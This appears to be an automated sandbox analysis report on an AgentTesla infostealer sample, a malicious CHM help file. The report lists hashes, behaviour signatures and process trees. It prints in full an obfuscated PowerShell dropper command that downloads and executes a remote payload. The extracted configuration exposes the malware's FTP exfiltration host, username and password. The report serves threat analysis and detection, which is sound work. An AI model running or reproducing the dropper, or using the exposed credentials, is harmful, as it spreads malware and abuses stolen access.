agenttesla | 908d78eb614a8ecf652163a4ccbdf62deec33d03747d4342d4f90e5bcf7995d8

General

Target

mel9.chm
Size

13KB
MD5

e7a3bc55f52eebb6ce7df0a0047fec40
SHA1

b152e0d6abc8dab4500aaa4161dac968e54cad20
SHA256

908d78eb614a8ecf652163a4ccbdf62deec33d03747d4342d4f90e5bcf7995d8
SHA512

3537fee98df7a02510e65c4a7fbe302e154d37e5ea497fe2677936f3442afc565a4a6307a870971ca3f45a8d25bee50b71a04c515664737cbe72d4031a186a81
SSDEEP

192:8FYhJztroZ7rRXcAU9aoSpW9KZYtsufMCKv6:gYjtroZ7rAv9yYtsuFKv

Score

10^/10

agenttesla keylogger spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://cricot2.kylos.pl/mel9.txt

Extracted

Family

agenttesla

Credentials

Protocol: ftp
Host:
ftp://ftp.peva.it
Port:
21
Username:
anita@peva.it
Password:
Team2318!@#

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

75 2460 powershell.exe
Loads dropped DLL 2 IoCs

Processes:

powershell.exe

pid process

2460 powershell.exe
2460 powershell.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2460 set thread context of 3036 2460 powershell.exe RegAsm.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exeRegAsm.exe

pid process

2460 powershell.exe
2460 powershell.exe
3036 RegAsm.exe
3036 RegAsm.exe

flow	pid	process
75	2460	powershell.exe

pid	process
2460	powershell.exe
2460	powershell.exe

description	pid	process	target process
PID 2460 set thread context of 3036	2460	powershell.exe	RegAsm.exe

pid	process
2460	powershell.exe
2460	powershell.exe
3036	RegAsm.exe
3036	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 44 IoCs

Processes:

powershell.exeRegAsm.exe

description	pid	process
Token: SeDebugPrivilege	2460	powershell.exe
Token: SeIncreaseQuotaPrivilege	2460	powershell.exe
Token: SeSecurityPrivilege	2460	powershell.exe
Token: SeTakeOwnershipPrivilege	2460	powershell.exe
Token: SeLoadDriverPrivilege	2460	powershell.exe
Token: SeSystemProfilePrivilege	2460	powershell.exe
Token: SeSystemtimePrivilege	2460	powershell.exe
Token: SeProfSingleProcessPrivilege	2460	powershell.exe
Token: SeIncBasePriorityPrivilege	2460	powershell.exe
Token: SeCreatePagefilePrivilege	2460	powershell.exe
Token: SeBackupPrivilege	2460	powershell.exe
Token: SeRestorePrivilege	2460	powershell.exe
Token: SeShutdownPrivilege	2460	powershell.exe
Token: SeDebugPrivilege	2460	powershell.exe
Token: SeSystemEnvironmentPrivilege	2460	powershell.exe
Token: SeRemoteShutdownPrivilege	2460	powershell.exe
Token: SeUndockPrivilege	2460	powershell.exe
Token: SeManageVolumePrivilege	2460	powershell.exe
Token: 33	2460	powershell.exe
Token: 34	2460	powershell.exe
Token: 35	2460	powershell.exe
Token: 36	2460	powershell.exe
Token: SeIncreaseQuotaPrivilege	2460	powershell.exe
Token: SeSecurityPrivilege	2460	powershell.exe
Token: SeTakeOwnershipPrivilege	2460	powershell.exe
Token: SeLoadDriverPrivilege	2460	powershell.exe
Token: SeSystemProfilePrivilege	2460	powershell.exe
Token: SeSystemtimePrivilege	2460	powershell.exe
Token: SeProfSingleProcessPrivilege	2460	powershell.exe
Token: SeIncBasePriorityPrivilege	2460	powershell.exe
Token: SeCreatePagefilePrivilege	2460	powershell.exe
Token: SeBackupPrivilege	2460	powershell.exe
Token: SeRestorePrivilege	2460	powershell.exe
Token: SeShutdownPrivilege	2460	powershell.exe
Token: SeDebugPrivilege	2460	powershell.exe
Token: SeSystemEnvironmentPrivilege	2460	powershell.exe
Token: SeRemoteShutdownPrivilege	2460	powershell.exe
Token: SeUndockPrivilege	2460	powershell.exe
Token: SeManageVolumePrivilege	2460	powershell.exe
Token: 33	2460	powershell.exe
Token: 34	2460	powershell.exe
Token: 35	2460	powershell.exe
Token: 36	2460	powershell.exe
Token: SeDebugPrivilege	3036	RegAsm.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

hh.exe

pid process

1212 hh.exe
1212 hh.exe

pid	process
1212	hh.exe
1212	hh.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

hh.exepowershell.exe

description	pid	process	target process
PID 1212 wrote to memory of 2460	1212	hh.exe	powershell.exe
PID 1212 wrote to memory of 2460	1212	hh.exe	powershell.exe
PID 2460 wrote to memory of 3036	2460	powershell.exe	RegAsm.exe
PID 2460 wrote to memory of 3036	2460	powershell.exe	RegAsm.exe
PID 2460 wrote to memory of 3036	2460	powershell.exe	RegAsm.exe
PID 2460 wrote to memory of 3036	2460	powershell.exe	RegAsm.exe
PID 2460 wrote to memory of 3036	2460	powershell.exe	RegAsm.exe
PID 2460 wrote to memory of 3036	2460	powershell.exe	RegAsm.exe
PID 2460 wrote to memory of 3036	2460	powershell.exe	RegAsm.exe
PID 2460 wrote to memory of 3036	2460	powershell.exe	RegAsm.exe

C:\Windows\hh.exe
"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\mel9.chm
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://cricot2.kylos.pl/mel9.txt')|P
2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2460

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3036

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

1

T1081

Discovery

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6fa7e56d-5a67-4728-a5db-c67fd5cf7763\AgileDotNetRT64.dll
Filesize
75KB

MD5
42b2c266e49a3acd346b91e3b0e638c0

SHA1
2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

SHA256
adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

SHA512
770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

Download Submit
C:\Users\Admin\AppData\Local\Temp\f1c816ee-9c5b-4ee5-8939-4ab00a42e9d3\AgileDotNetRT64.dll
Filesize
75KB

MD5
42b2c266e49a3acd346b91e3b0e638c0

SHA1
2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

SHA256
adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

SHA512
770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

Download Submit
memory/2460-135-0x00007FFBD2B50000-0x00007FFBD3611000-memory.dmp

Filesize
10.8MB

Download
memory/2460-134-0x000002329FA60000-0x000002329FA82000-memory.dmp

Filesize
136KB

Download
memory/2460-137-0x00007FFBD2B50000-0x00007FFBD3611000-memory.dmp

Filesize
10.8MB

Download
memory/2460-138-0x00007FFBC9A20000-0x00007FFBC9B6E000-memory.dmp

Filesize
1.3MB

Download
memory/2460-133-0x0000000000000000-mapping.dmp

Download
memory/2460-143-0x00007FFBD2B50000-0x00007FFBD3611000-memory.dmp

Filesize
10.8MB

Download
memory/3036-140-0x0000000000400000-0x000000000043C000-memory.dmp

Filesize
240KB

Download
memory/3036-141-0x0000000000437A7E-mapping.dmp

Download
memory/3036-142-0x0000000005460000-0x0000000005A04000-memory.dmp

Filesize
5.6MB

Download
memory/3036-144-0x00000000051E0000-0x000000000527C000-memory.dmp

Filesize
624KB

Download
memory/3036-145-0x00000000053F0000-0x0000000005456000-memory.dmp

Filesize
408KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads